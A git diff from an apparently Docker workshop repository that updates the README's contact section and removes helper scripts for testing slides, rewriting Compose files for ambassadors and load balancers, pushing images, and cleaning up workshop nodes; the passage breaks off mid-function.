@@ -13,80 +276,7 @@ at multiple conferences and events like:
|
||||
- SCALE, Pasadena (2016, January)
|
||||
- Zenika, Paris (2016, February)
|
||||
- Container Solutions, Amsterdam (2016, February)
|
||||
|
||||
|
||||
## Slides
|
||||
|
||||
The slides are in the `www/htdocs` directory.
|
||||
|
||||
The recommended way to view them is to:
|
||||
|
||||
- have a Docker host
|
||||
- clone this repository to your Docker host
|
||||
- `cd www && docker-compose up -d`
|
||||
- this will start a web server on port 80
|
||||
- point your browser at your Docker host and enjoy
|
||||
|
||||
|
||||
## Sample code
|
||||
|
||||
The sample app is in the `dockercoins` directory.
|
||||
|
||||
To see it in action:
|
||||
|
||||
- `cd dockercoins && docker-compose up -d`
|
||||
- this will build and start all the services
|
||||
- the web UI will be available on port 8000
|
||||
|
||||
|
||||
## Running the workshop
|
||||
|
||||
WARNING: those instructions are incomplete. Consider
|
||||
them as notes quickly drafted on a napkin rather than
|
||||
proper documentation!
|
||||
|
||||
|
||||
### Creating the VMs
|
||||
|
||||
I use the `trainctl` script from the `docker-fundamentals`
|
||||
repository. Sorry if you don't have that!
|
||||
|
||||
After starting the VMs, use the `trainctl ips` command
|
||||
to dump the list of IP addresses into a file named `ips.txt`.
|
||||
|
||||
|
||||
### Generating the printed cards
|
||||
|
||||
- Put `ips.txt` file in `prepare-vms` directory.
|
||||
- Generate HTML file.
|
||||
- Open it in Chrome.
|
||||
- Transform to PDF.
|
||||
- Print it.
|
||||
|
||||
|
||||
### Deploying your SSH key to all the machines
|
||||
|
||||
- Make sure that you have SSH keys loaded (`ssh-add -l`).
|
||||
- Source `rc`.
|
||||
- Run `pcopykey`.
|
||||
|
||||
|
||||
### Installing extra packages
|
||||
|
||||
- Source `postprep.rc`.
|
||||
(This will install a few extra packages, add entries to
|
||||
/etc/hosts, generate SSH keys, and deploy them on all hosts.)
|
||||
|
||||
|
||||
### Final touches
|
||||
|
||||
- Set two groups of machines for instructor's use.
|
||||
- You will use the first group during the workshop.
|
||||
- The second group will run a web server with the slides.
|
||||
- Log into the first machine of the second group.
|
||||
- Git clone this repo.
|
||||
- Put up the web server as instructed above.
|
||||
- Use cli53 to add an A record for e.g. `view.dckr.info`.
|
||||
- ... and much more!
|
||||
|
||||
|
||||
# Problems? Bugs? Questions?
|
||||
@@ -99,12 +289,34 @@ If there is a bug and you can't fix it, but you can
|
||||
reproduce it: submit an issue explaining how to reproduce.
|
||||
|
||||
If there is a bug and you can't even reproduce it:
|
||||
sorry. It is probably an Heisenbug. I can't act on it
|
||||
until it's reproducible.
|
||||
sorry. It is probably an Heisenbug. We can't act on it
|
||||
until it's reproducible, alas.
|
||||
|
||||
if you have attended this workshop and have feedback,
|
||||
or if you want us to deliver that workshop at your
|
||||
conference or for your company: contact me (jerome
|
||||
at docker dot com).
|
||||
|
||||
Thank you!
|
||||
# “Please teach us!”
|
||||
|
||||
If you have attended one of these workshops, and want
|
||||
your team or organization to attend a similar one, you
|
||||
can look at the list of upcoming events on
|
||||
http://container.training/.
|
||||
|
||||
You are also welcome to reuse these materials to run
|
||||
your own workshop, for your team or even at a meetup
|
||||
or conference. In that case, you might enjoy watching
|
||||
[Bridget Kromhout's talk at KubeCon 2018 Europe](
|
||||
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
|
||||
precisely how to run such a workshop yourself.
|
||||
|
||||
Finally, you can also contact the following persons,
|
||||
who are experienced speakers, are familiar with the
|
||||
material, and are available to deliver these workshops
|
||||
at your conference or for your company:
|
||||
|
||||
- jerome dot petazzoni at gmail dot com
|
||||
- bret at bretfisher dot com
|
||||
|
||||
(If you are willing and able to deliver such workshops,
|
||||
feel free to submit a PR to add your name to that list!)
|
||||
|
||||
**Thank you!**
|
||||
|
||||
|
||||
@@ -1,191 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import re
|
||||
import signal
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
def print_snippet(snippet):
|
||||
print(78*'-')
|
||||
print(snippet)
|
||||
print(78*'-')
|
||||
|
||||
class Snippet(object):
|
||||
|
||||
def __init__(self, slide, content):
|
||||
self.slide = slide
|
||||
self.content = content
|
||||
self.actions = []
|
||||
|
||||
def __str__(self):
|
||||
return self.content
|
||||
|
||||
|
||||
class Slide(object):
|
||||
|
||||
current_slide = 0
|
||||
|
||||
def __init__(self, content):
|
||||
Slide.current_slide += 1
|
||||
self.number = Slide.current_slide
|
||||
# Remove commented-out slides
|
||||
# (remark.js considers ??? to be the separator for speaker notes)
|
||||
content = re.split("\n\?\?\?\n", content)[0]
|
||||
self.content = content
|
||||
self.snippets = []
|
||||
exercises = re.findall("\.exercise\[(.*)\]", content, re.DOTALL)
|
||||
for exercise in exercises:
|
||||
if "```" in exercise and "<br/>`" in exercise:
|
||||
print("! Exercise on slide {} has both ``` and <br/>` delimiters, skipping."
|
||||
.format(self.number))
|
||||
print_snippet(exercise)
|
||||
elif "```" in exercise:
|
||||
for snippet in exercise.split("```")[1::2]:
|
||||
self.snippets.append(Snippet(self, snippet))
|
||||
elif "<br/>`" in exercise:
|
||||
for snippet in re.findall("<br/>`(.*)`", exercise):
|
||||
self.snippets.append(Snippet(self, snippet))
|
||||
else:
|
||||
print(" Exercise on slide {} has neither ``` or <br/>` delimiters, skipping."
|
||||
.format(self.number))
|
||||
|
||||
def __str__(self):
|
||||
text = self.content
|
||||
for snippet in self.snippets:
|
||||
text = text.replace(snippet.content, ansi("7")(snippet.content))
|
||||
return text
|
||||
|
||||
|
||||
def ansi(code):
|
||||
return lambda s: "\x1b[{}m{}\x1b[0m".format(code, s)
|
||||
|
||||
slides = []
|
||||
with open("index.html") as f:
|
||||
content = f.read()
|
||||
for slide in re.split("\n---?\n", content):
|
||||
slides.append(Slide(slide))
|
||||
|
||||
is_editing_file = False
|
||||
placeholders = {}
|
||||
for slide in slides:
|
||||
for snippet in slide.snippets:
|
||||
content = snippet.content
|
||||
# Multi-line snippets should be ```highlightsyntax...
|
||||
# Single-line snippets will be interpreted as shell commands
|
||||
if '\n' in content:
|
||||
highlight, content = content.split('\n', 1)
|
||||
else:
|
||||
highlight = "bash"
|
||||
content = content.strip()
|
||||
# If the previous snippet was a file fragment, and the current
|
||||
# snippet is not YAML or EDIT, complain.
|
||||
if is_editing_file and highlight not in ["yaml", "edit"]:
|
||||
print("! On slide {}, previous snippet was YAML, so what do what do?"
|
||||
.format(slide.number))
|
||||
print_snippet(content)
|
||||
is_editing_file = False
|
||||
if highlight == "yaml":
|
||||
is_editing_file = True
|
||||
elif highlight == "placeholder":
|
||||
for line in content.split('\n'):
|
||||
variable, value = line.split(' ', 1)
|
||||
placeholders[variable] = value
|
||||
elif highlight == "bash":
|
||||
for variable, value in placeholders.items():
|
||||
quoted = "`{}`".format(variable)
|
||||
if quoted in content:
|
||||
content = content.replace(quoted, value)
|
||||
del placeholders[variable]
|
||||
if '`' in content:
|
||||
print("! The following snippet on slide {} contains a backtick:"
|
||||
.format(slide.number))
|
||||
print_snippet(content)
|
||||
continue
|
||||
print("_ "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
elif highlight == "edit":
|
||||
print(". "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
elif highlight == "meta":
|
||||
print("^ "+content)
|
||||
snippet.actions.append((highlight, content))
|
||||
else:
|
||||
print("! Unknown highlight {!r} on slide {}.".format(highlight, slide.number))
|
||||
if placeholders:
|
||||
print("! Remaining placeholder values: {}".format(placeholders))
|
||||
|
||||
actions = sum([snippet.actions for snippet in sum([slide.snippets for slide in slides], [])], [])
|
||||
|
||||
# Strip ^{ ... ^} for now
|
||||
def strip_curly_braces(actions, in_braces=False):
|
||||
if actions == []:
|
||||
return []
|
||||
elif actions[0] == ("meta", "^{"):
|
||||
return strip_curly_braces(actions[1:], True)
|
||||
elif actions[0] == ("meta", "^}"):
|
||||
return strip_curly_braces(actions[1:], False)
|
||||
elif in_braces:
|
||||
return strip_curly_braces(actions[1:], True)
|
||||
else:
|
||||
return [actions[0]] + strip_curly_braces(actions[1:], False)
|
||||
|
||||
actions = strip_curly_braces(actions)
|
||||
|
||||
background = []
|
||||
cwd = os.path.expanduser("~")
|
||||
env = {}
|
||||
for current_action, next_action in zip(actions, actions[1:]+[("bash", "true")]):
|
||||
if current_action[0] == "meta":
|
||||
continue
|
||||
print(ansi(7)(">>> {}".format(current_action[1])))
|
||||
time.sleep(1)
|
||||
popen_options = dict(shell=True, cwd=cwd, stdin=subprocess.PIPE, preexec_fn=os.setpgrp)
|
||||
# The follow hack allows to capture the environment variables set by `docker-machine env`
|
||||
# FIXME: this doesn't handle `unset` for now
|
||||
if any([
|
||||
"eval $(docker-machine env" in current_action[1],
|
||||
"DOCKER_HOST" in current_action[1],
|
||||
"COMPOSE_FILE" in current_action[1],
|
||||
]):
|
||||
popen_options["stdout"] = subprocess.PIPE
|
||||
current_action[1] += "\nenv"
|
||||
proc = subprocess.Popen(current_action[1], **popen_options)
|
||||
proc.cmd = current_action[1]
|
||||
if next_action[0] == "meta":
|
||||
print(">>> {}".format(next_action[1]))
|
||||
time.sleep(3)
|
||||
if next_action[1] == "^C":
|
||||
os.killpg(proc.pid, signal.SIGINT)
|
||||
proc.wait()
|
||||
elif next_action[1] == "^Z":
|
||||
# Let the process run
|
||||
background.append(proc)
|
||||
elif next_action[1] == "^D":
|
||||
proc.communicate()
|
||||
proc.wait()
|
||||
else:
|
||||
print("! Unknown meta action {} after snippet:".format(next_action[1]))
|
||||
print_snippet(next_action[1])
|
||||
print(ansi(7)("<<< {}".format(current_action[1])))
|
||||
else:
|
||||
proc.wait()
|
||||
if "stdout" in popen_options:
|
||||
stdout, stderr = proc.communicate()
|
||||
for line in stdout.split('\n'):
|
||||
if line.startswith("DOCKER_"):
|
||||
variable, value = line.split('=', 1)
|
||||
env[variable] = value
|
||||
print("=== {}={}".format(variable, value))
|
||||
print(ansi(7)("<<< {} >>> {}".format(proc.returncode, current_action[1])))
|
||||
if proc.returncode != 0:
|
||||
print("Got non-zero status code; aborting.")
|
||||
break
|
||||
if current_action[1].startswith("cd "):
|
||||
cwd = os.path.expanduser(current_action[1][3:])
|
||||
for proc in background:
|
||||
print("Terminating background process:")
|
||||
print_snippet(proc.cmd)
|
||||
proc.terminate()
|
||||
proc.wait()
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
../www/htdocs/index.html
|
||||
@@ -1,42 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
# arg 1 = service name
|
||||
# arg 2 = number of instances
|
||||
|
||||
service_name = sys.argv[1]
|
||||
desired_instances = int(sys.argv[2])
|
||||
|
||||
compose_file = os.environ["COMPOSE_FILE"]
|
||||
input_file, output_file = compose_file, compose_file
|
||||
|
||||
config = yaml.load(open(input_file))
|
||||
|
||||
# The ambassadors need to know the service port to use.
|
||||
# Those ports must be declared here.
|
||||
ports = yaml.load(open("ports.yml"))
|
||||
|
||||
port = str(ports[service_name])
|
||||
|
||||
command_line = port
|
||||
|
||||
depends_on = []
|
||||
|
||||
for n in range(1, 1+desired_instances):
|
||||
config["services"]["{}{}".format(service_name, n)] = config["services"][service_name]
|
||||
command_line += " {}{}:{}".format(service_name, n, port)
|
||||
depends_on.append("{}{}".format(service_name, n))
|
||||
|
||||
config["services"][service_name] = {
|
||||
"image": "jpetazzo/hamba",
|
||||
"command": command_line,
|
||||
"depends_on": depends_on,
|
||||
}
|
||||
if "networks" in config["services"]["{}1".format(service_name)]:
|
||||
config["services"][service_name]["networks"] = config["services"]["{}1".format(service_name)]["networks"]
|
||||
|
||||
yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)
|
||||
|
||||
@@ -1,87 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
def error(msg):
|
||||
print("ERROR: {}".format(msg))
|
||||
exit(1)
|
||||
|
||||
# arg 1 = service name
|
||||
|
||||
service_name = sys.argv[1]
|
||||
|
||||
compose_file = os.environ["COMPOSE_FILE"]
|
||||
input_file, output_file = compose_file, compose_file
|
||||
|
||||
config = yaml.load(open(input_file))
|
||||
|
||||
version = config.get("version")
|
||||
if version != "2":
|
||||
error("Unsupported $COMPOSE_FILE version: {!r}".format(version))
|
||||
|
||||
# The load balancers need to know the service port to use.
|
||||
# Those ports must be declared here.
|
||||
ports = yaml.load(open("ports.yml"))
|
||||
|
||||
port = str(ports[service_name])
|
||||
|
||||
if service_name not in config["services"]:
|
||||
error("service {} not found in $COMPOSE_FILE"
|
||||
.format(service_name))
|
||||
|
||||
lb_name = "{}-lb".format(service_name)
|
||||
be_name = "{}-be".format(service_name)
|
||||
wd_name = "{}-wd".format(service_name)
|
||||
|
||||
if lb_name in config["services"]:
|
||||
error("load balancer {} already exists in $COMPOSE_FILE"
|
||||
.format(lb_name))
|
||||
|
||||
if wd_name in config["services"]:
|
||||
error("dns watcher {} already exists in $COMPOSE_FILE"
|
||||
.format(wd_name))
|
||||
|
||||
service = config["services"][service_name]
|
||||
if "networks" in service:
|
||||
error("service {} has custom networks"
|
||||
.format(service_name))
|
||||
|
||||
# Put the service on its own network.
|
||||
service["networks"] = {service_name: {"aliases": [ be_name ] } }
|
||||
# Put a label indicating which load balancer is responsible for this service.
|
||||
if "labels" not in service:
|
||||
service["labels"] = {}
|
||||
service["labels"]["loadbalancer"] = lb_name
|
||||
|
||||
# Add the load balancer.
|
||||
config["services"][lb_name] = {
|
||||
"image": "jpetazzo/hamba",
|
||||
"command": "{} {} {}".format(port, be_name, port),
|
||||
"depends_on": [ service_name ],
|
||||
"networks": {
|
||||
"default": {
|
||||
"aliases": [ service_name ],
|
||||
},
|
||||
service_name: None,
|
||||
},
|
||||
}
|
||||
|
||||
# Add the DNS watcher.
|
||||
config["services"][wd_name] = {
|
||||
"image": "jpetazzo/watchdns",
|
||||
"command": "{} {} {}".format(port, be_name, port),
|
||||
"volumes_from": [ lb_name ],
|
||||
"networks": {
|
||||
service_name: None,
|
||||
},
|
||||
}
|
||||
|
||||
if "networks" not in config:
|
||||
config["networks"] = {}
|
||||
if service_name not in config["networks"]:
|
||||
config["networks"][service_name] = None
|
||||
|
||||
yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)
|
||||
|
||||
@@ -1,63 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from common import ComposeFile
|
||||
import os
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
registry = os.environ.get("DOCKER_REGISTRY")
|
||||
|
||||
if not registry:
|
||||
print("Please set the DOCKER_REGISTRY variable, e.g.:")
|
||||
print("export DOCKER_REGISTRY=jpetazzo # use the Docker Hub")
|
||||
print("export DOCKER_REGISTRY=localhost:5000 # use a local registry")
|
||||
exit(1)
|
||||
|
||||
# Get the name of the current directory.
|
||||
project_name = os.path.basename(os.path.realpath("."))
|
||||
|
||||
# Version used to tag the generated Docker image, using the UNIX timestamp or the given version.
|
||||
if "VERSION" not in os.environ:
|
||||
version = str(int(time.time()))
|
||||
else:
|
||||
version = os.environ["VERSION"]
|
||||
|
||||
# Execute "docker-compose build" and abort if it fails.
|
||||
subprocess.check_call(["docker-compose", "-f", "docker-compose.yml", "build"])
|
||||
|
||||
# Load the services from the input docker-compose.yml file.
|
||||
# TODO: run parallel builds.
|
||||
compose_file = ComposeFile("docker-compose.yml")
|
||||
|
||||
# Iterate over all services that have a "build" definition.
|
||||
# Tag them, and initiate a push in the background.
|
||||
push_operations = dict()
|
||||
for service_name, service in compose_file.services.items():
|
||||
if "build" in service:
|
||||
compose_image = "{}_{}".format(project_name, service_name)
|
||||
registry_image = "{}/{}:{}".format(registry, compose_image, version)
|
||||
# Re-tag the image so that it can be uploaded to the registry.
|
||||
subprocess.check_call(["docker", "tag", compose_image, registry_image])
|
||||
# Spawn "docker push" to upload the image.
|
||||
push_operations[service_name] = subprocess.Popen(["docker", "push", registry_image])
|
||||
# Replace the "build" definition by an "image" definition,
|
||||
# using the name of the image on the registry.
|
||||
del service["build"]
|
||||
service["image"] = registry_image
|
||||
|
||||
# Wait for push operations to complete.
|
||||
for service_name, popen_object in push_operations.items():
|
||||
print("Waiting for {} push to complete...".format(service_name))
|
||||
popen_object.wait()
|
||||
print("Done.")
|
||||
|
||||
# Write the new docker-compose.yml file.
|
||||
if "COMPOSE_FILE" not in os.environ:
|
||||
os.environ["COMPOSE_FILE"] = "docker-compose.yml-{}".format(version)
|
||||
print("Writing to new Compose file:")
|
||||
else:
|
||||
print("Writing to provided Compose file:")
|
||||
|
||||
print("COMPOSE_FILE={}".format(os.environ["COMPOSE_FILE"]))
|
||||
compose_file.save()
|
||||
|
||||
@@ -1,76 +0,0 @@
|
||||
import os
|
||||
import subprocess
|
||||
import sys
|
||||
import time
|
||||
import yaml
|
||||
|
||||
|
||||
def COMPOSE_FILE():
|
||||
if "COMPOSE_FILE" not in os.environ:
|
||||
print("The $COMPOSE_FILE environment variable is not set. Aborting.")
|
||||
exit(1)
|
||||
return os.environ["COMPOSE_FILE"]
|
||||
|
||||
|
||||
class ComposeFile(object):
|
||||
|
||||
def __init__(self, filename=None):
|
||||
if filename is None:
|
||||
filename = COMPOSE_FILE()
|
||||
if not os.path.isfile(filename):
|
||||
print("File {!r} does not exist. Aborting.".format(filename))
|
||||
exit(1)
|
||||
self.data = yaml.load(open(filename))
|
||||
|
||||
@property
|
||||
def services(self):
|
||||
if self.data.get("version") == "2":
|
||||
return self.data["services"]
|
||||
else:
|
||||
return self.data
|
||||
|
||||
def save(self, filename=None):
|
||||
if filename is None:
|
||||
filename = COMPOSE_FILE()
|
||||
with open(filename, "w") as f:
|
||||
yaml.safe_dump(self.data, f, default_flow_style=False)
|
||||
|
||||
# Executes a bunch of commands in parallel, but no more than N at a time.
|
||||
# This allows to execute concurrently a large number of tasks, without
|
||||
# turning into a fork bomb.
|
||||
# `parallelism` is the number of tasks to execute simultaneously.
|
||||
# `commands` is a list of tasks to execute.
|
||||
# Each task is itself a list, where the first element is a descriptive
|
||||
# string, and the folloowing elements are the arguments to pass to Popen.
|
||||
def parallel_run(commands, parallelism):
|
||||
running = []
|
||||
# While stuff is running, or we have stuff to run...
|
||||
while commands or running:
|
||||
# While there is stuff to run, and room in the pipe...
|
||||
while commands and len(running)<parallelism:
|
||||
command = commands.pop(0)
|
||||
print("START {}".format(command[0]))
|
||||
popen = subprocess.Popen(
|
||||
command[1:], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
|
||||
popen._desc = command[0]
|
||||
running.append(popen)
|
||||
must_sleep = True
|
||||
for popen in running:
|
||||
status = popen.poll()
|
||||
if status is not None:
|
||||
must_sleep = False
|
||||
running.remove(popen)
|
||||
if status==0:
|
||||
print("OK {}".format(popen._desc))
|
||||
else:
|
||||
print("ERROR {} [Exit status: {}]"
|
||||
.format(popen._desc, status))
|
||||
output = "\n" + popen.communicate()[0].strip()
|
||||
output = output.replace("\n", "\n| ")
|
||||
print(output)
|
||||
else:
|
||||
print("WAIT ({} running, {} more to run)"
|
||||
.format(len(running), len(commands)))
|
||||
if must_sleep:
|
||||
time.sleep(1)
|
||||
|
||||
@@ -1,69 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from common import parallel_run
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
project_name = os.path.basename(os.path.realpath("."))
|
||||
|
||||
# Get all services and backends in our compose application.
|
||||
containers_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=com.docker.compose.project={}".format(project_name),
|
||||
"--format", '{{ .ID }} '
|
||||
'{{ .Label "com.docker.compose.service" }} '
|
||||
'{{ .Ports }}',
|
||||
])
|
||||
|
||||
# Build list of backends.
|
||||
frontend_ports = dict()
|
||||
backends = dict()
|
||||
for container in containers_data.split('\n'):
|
||||
if not container:
|
||||
continue
|
||||
# TODO: support services with multiple ports!
|
||||
container_id, service_name, port = container.split(' ')
|
||||
if not port:
|
||||
continue
|
||||
backend, frontend = port.split("->")
|
||||
backend_addr, backend_port = backend.split(':')
|
||||
frontend_port, frontend_proto = frontend.split('/')
|
||||
# TODO: deal with udp (mostly skip it?)
|
||||
assert frontend_proto == "tcp"
|
||||
# TODO: check inconsistencies between port mappings
|
||||
frontend_ports[service_name] = frontend_port
|
||||
if service_name not in backends:
|
||||
backends[service_name] = []
|
||||
backends[service_name].append((backend_addr, backend_port))
|
||||
|
||||
# Get all existing ambassadors for this application.
|
||||
ambassadors_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=ambassador.project={}".format(project_name),
|
||||
"--format", '{{ .ID }} '
|
||||
'{{ .Label "ambassador.service" }} '
|
||||
'{{ .Label "ambassador.bindaddr" }}',
|
||||
])
|
||||
|
||||
# Update ambassadors.
|
||||
operations = []
|
||||
for ambassador in ambassadors_data.split('\n'):
|
||||
if not ambassador:
|
||||
continue
|
||||
ambassador_id, service_name, bind_address = ambassador.split()
|
||||
print("Updating configuration for {}/{} -> {}:{} -> {}"
|
||||
.format(service_name, ambassador_id,
|
||||
bind_address, frontend_ports[service_name],
|
||||
backends[service_name]))
|
||||
command = [
|
||||
ambassador_id,
|
||||
"docker", "run", "--rm", "--volumes-from", ambassador_id,
|
||||
"jpetazzo/hamba", "reconfigure",
|
||||
"{}:{}".format(bind_address, frontend_ports[service_name])
|
||||
]
|
||||
for backend_addr, backend_port in backends[service_name]:
|
||||
command.extend([backend_addr, backend_port])
|
||||
operations.append(command)
|
||||
|
||||
# Execute all commands in parallel.
|
||||
parallel_run(operations, 10)
|
||||
@@ -1,71 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from common import ComposeFile, parallel_run
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
config = ComposeFile()
|
||||
|
||||
project_name = os.path.basename(os.path.realpath("."))
|
||||
|
||||
# Get all services in our compose application.
|
||||
containers_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=com.docker.compose.project={}".format(project_name),
|
||||
"--format", '{{ .ID }} {{ .Label "com.docker.compose.service" }}',
|
||||
])
|
||||
|
||||
# Get all existing ambassadors for this application.
|
||||
ambassadors_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=ambassador.project={}".format(project_name),
|
||||
"--format", '{{ .ID }} '
|
||||
'{{ .Label "ambassador.container" }} '
|
||||
'{{ .Label "ambassador.service" }}',
|
||||
])
|
||||
|
||||
# Build a set of existing ambassadors.
|
||||
ambassadors = dict()
|
||||
for ambassador in ambassadors_data.split('\n'):
|
||||
if not ambassador:
|
||||
continue
|
||||
ambassador_id, container_id, linked_service = ambassador.split()
|
||||
ambassadors[container_id, linked_service] = ambassador_id
|
||||
|
||||
operations = []
|
||||
|
||||
# Start the missing ambassadors.
|
||||
for container in containers_data.split('\n'):
|
||||
if not container:
|
||||
continue
|
||||
container_id, service_name = container.split()
|
||||
extra_hosts = config.services[service_name].get("extra_hosts", {})
|
||||
for linked_service, bind_address in extra_hosts.items():
|
||||
description = "Ambassador {}/{}/{}".format(
|
||||
service_name, container_id, linked_service)
|
||||
ambassador_id = ambassadors.pop((container_id, linked_service), None)
|
||||
if ambassador_id:
|
||||
print("{} already exists: {}".format(description, ambassador_id))
|
||||
else:
|
||||
print("{} not found, creating it.".format(description))
|
||||
operations.append([
|
||||
description,
|
||||
"docker", "run", "-d",
|
||||
"--net", "container:{}".format(container_id),
|
||||
"--label", "ambassador.project={}".format(project_name),
|
||||
"--label", "ambassador.container={}".format(container_id),
|
||||
"--label", "ambassador.service={}".format(linked_service),
|
||||
"--label", "ambassador.bindaddr={}".format(bind_address),
|
||||
"jpetazzo/hamba", "run"
|
||||
])
|
||||
|
||||
# Destroy extraneous ambassadors.
|
||||
for ambassador_id in ambassadors.values():
|
||||
print("{} is not useful anymore, destroying it.".format(ambassador_id))
|
||||
operations.append([
|
||||
"rm -f {}".format(ambassador_id),
|
||||
"docker", "rm", "-f", ambassador_id,
|
||||
])
|
||||
|
||||
# Execute all commands in parallel.
|
||||
parallel_run(operations, 10)
|
||||
@@ -1,3 +0,0 @@
|
||||
#!/bin/sh
|
||||
docker ps -q --filter label=ambassador.project=dockercoins |
|
||||
xargs docker rm -f
|
||||
@@ -1,16 +0,0 @@
|
||||
#!/bin/sh
|
||||
# Some tools will choke on the YAML files generated by PyYAML;
|
||||
# in particular on a section like this one:
|
||||
#
|
||||
# service:
|
||||
# ports:
|
||||
# - 8000:5000
|
||||
#
|
||||
# This script adds two spaces in front of the dash in those files.
|
||||
# Warning: it is a hack, and probably won't work on some YAML files.
|
||||
[ -f "$COMPOSE_FILE" ] || {
|
||||
echo "Cannot find COMPOSE_FILE"
|
||||
exit 1
|
||||
}
|
||||
sed -i 's/^ -/ -/' $COMPOSE_FILE
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from common import ComposeFile
|
||||
import yaml
|
||||
|
||||
config = ComposeFile()
|
||||
|
||||
# The ambassadors need to know the service port to use.
|
||||
# Those ports must be declared here.
|
||||
ports = yaml.load(open("ports.yml"))
|
||||
|
||||
def generate_local_addr():
|
||||
last_byte = 2
|
||||
while last_byte<255:
|
||||
yield "127.127.0.{}".format(last_byte)
|
||||
last_byte += 1
|
||||
|
||||
for service_name, service in config.services.items():
|
||||
if "links" in service:
|
||||
for link, local_addr in zip(service["links"], generate_local_addr()):
|
||||
if link not in ports:
|
||||
print("Skipping link {} in service {} "
|
||||
"(no port mapping defined). "
|
||||
"Your code will probably break."
|
||||
.format(link, service_name))
|
||||
continue
|
||||
if "extra_hosts" not in service:
|
||||
service["extra_hosts"] = {}
|
||||
service["extra_hosts"][link] = local_addr
|
||||
del service["links"]
|
||||
if "ports" in service:
|
||||
del service["ports"]
|
||||
if "volumes" in service:
|
||||
del service["volumes"]
|
||||
if service_name in ports:
|
||||
service["ports"] = [ ports[service_name] ]
|
||||
|
||||
config.save()
|
||||
@@ -1,46 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
# FIXME: hardcoded
|
||||
PORT="80"
|
||||
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
project_name = os.path.basename(os.path.realpath("."))
|
||||
|
||||
# Get all existing services for this application.
|
||||
containers_data = subprocess.check_output([
|
||||
"docker", "ps",
|
||||
"--filter", "label=com.docker.compose.project={}".format(project_name),
|
||||
"--format", '{{ .Label "com.docker.compose.service" }} '
|
||||
'{{ .Label "com.docker.compose.container-number" }} '
|
||||
'{{ .Label "loadbalancer" }}',
|
||||
])
|
||||
|
||||
load_balancers = dict()
|
||||
for line in containers_data.split('\n'):
|
||||
if not line:
|
||||
continue
|
||||
service_name, container_number, load_balancer = line.split(' ')
|
||||
if load_balancer:
|
||||
if load_balancer not in load_balancers:
|
||||
load_balancers[load_balancer] = []
|
||||
load_balancers[load_balancer].append((service_name, int(container_number)))
|
||||
|
||||
for load_balancer, backends in load_balancers.items():
|
||||
# FIXME: iterate on all load balancers
|
||||
container_name = "{}_{}_1".format(project_name, load_balancer)
|
||||
command = [
|
||||
"docker", "run", "--rm",
|
||||
"--volumes-from", container_name,
|
||||
"--net", "container:{}".format(container_name),
|
||||
"jpetazzo/hamba", "reconfigure", PORT,
|
||||
]
|
||||
command.extend(
|
||||
"{}_{}_{}:{}".format(project_name, backend_name, backend_number, PORT)
|
||||
for (backend_name, backend_number) in sorted(backends)
|
||||
)
|
||||
print("Updating configuration for {} with {} backend(s)..."
|
||||
.format(container_name, len(backends)))
|
||||
subprocess.check_output(command)
|
||||
|
||||
@@ -1,201 +0,0 @@
|
||||
#!/bin/sh
|
||||
unset DOCKER_REGISTRY
|
||||
unset DOCKER_HOST
|
||||
unset COMPOSE_FILE
|
||||
|
||||
SWARM_IMAGE=${SWARM_IMAGE:-swarm}
|
||||
|
||||
prepare_1_check_ssh_keys () {
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N true
|
||||
done
|
||||
}
|
||||
|
||||
prepare_2_compile_swarm () {
|
||||
cd ~
|
||||
git clone git://github.com/docker/swarm
|
||||
cd swarm
|
||||
[[ -z "$1" ]] && {
|
||||
echo "Specify which revision to build."
|
||||
return
|
||||
}
|
||||
git checkout "$1" || return
|
||||
mkdir -p image
|
||||
docker build -t docker/swarm:$1 .
|
||||
docker run -i --entrypoint sh docker/swarm:$1 \
|
||||
-c 'cat $(which swarm)' > image/swarm
|
||||
chmod +x image/swarm
|
||||
cat >image/Dockerfile <<EOF
|
||||
FROM scratch
|
||||
COPY ./swarm /swarm
|
||||
ENTRYPOINT ["/swarm", "-debug", "-experimental"]
|
||||
EOF
|
||||
docker build -t jpetazzo/swarm:$1 image
|
||||
docker login
|
||||
docker push jpetazzo/swarm:$1
|
||||
docker logout
|
||||
SWARM_IMAGE=jpetazzo/swarm:$1
|
||||
}
|
||||
|
||||
clean_1_containers () {
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N "docker ps -aq | xargs -r -n1 -P10 docker rm -f"
|
||||
done
|
||||
}
|
||||
|
||||
clean_2_volumes () {
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N "docker volume ls -q | xargs -r docker volume rm"
|
||||
done
|
||||
}
|
||||
|
||||
clean_3_images () {
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N "docker images | awk '/dockercoins|jpetazzo/ {print \$1\":\"\$2}' | xargs -r docker rmi -f"
|
||||
done
|
||||
}
|
||||
|
||||
clean_4_machines () {
|
||||
rm -rf ~/.docker/machine/
|
||||
}
|
||||
|
||||
clean_all () {
|
||||
clean_1_containers
|
||||
clean_2_volumes
|
||||
clean_3_images
|
||||
clean_4_machines
|
||||
}
|
||||
|
||||
dm_swarm () {
